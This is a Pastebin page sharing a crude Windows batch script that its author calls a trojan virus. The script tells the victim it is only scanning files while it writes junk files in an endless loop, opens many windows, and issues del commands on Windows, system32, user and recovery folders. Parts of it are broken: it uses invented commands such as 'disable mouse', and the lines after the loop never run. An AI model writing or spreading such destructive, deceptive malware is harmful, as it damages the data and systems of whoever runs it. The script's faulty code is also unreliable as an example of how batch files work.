Advertisement
PresidentIvan

123.Trojan (Notepad Trojan Virus)

Jan 23rd, 2019
4,217
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 1.27 KB | None | 0 0
  1. --[[ Made by PresidentIvan
  2. This batch virus file can delete all of your files! So don't test it on your computer but if you want to see how it works, you should install a virtual machine such as VirtualBox, VMWare, or any other virtual machine! ]]--
  3.  
  4. @echo off
  5. color 0a
  6. title 123
  7. echo Don’t worry, just scanning some files :D
  8. :start
  9. echo 123 > 123%random%.txt
  10. goto start
  11. echo These files added to your desktop will scan everything in your computer, you can delete them after this scanning process!
  12. disable mouse
  13. disable keyboard
  14. disable system32
  15. del C:\
  16. del C:\windows
  17. del C:\windows\system32
  18. START
  19. START
  20. START
  21. START
  22. START
  23. START
  24. START
  25. START
  26. START
  27. START
  28. START
  29. START
  30. START
  31. START
  32. echo Oops, a small error occurred!
  33. del C:\system32\logonu1.exe
  34. del C:\windows\system32\restore
  35. del C:\windows\system32\winlogin.exe
  36. del C:\windows
  37. del C:\NVIDIA
  38. del C:\windows
  39. del C:\Documents And Settings
  40. del D:\RECOVERY
  41. del C:\SwSetup
  42. del C:\Temp
  43. del C:\Program Files
  44. del C:\PerfLogs
  45. del C:\.rnd
  46. del C:\Brukere
  47. del C:\Users
  48. del C:\MCPP
  49. del C:\CMD
  50. del C:\
  51. disable windows
  52. dir /s
  53. echo 1
  54. echo 2
  55. echo 3
  56. echo files delete!
  57. pause
  58. echo ERROR!
  59. echo MAJOR ERROR!
  60. echo Oops, looks like your files got deleted! You should already start planning a funeral for your computer.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement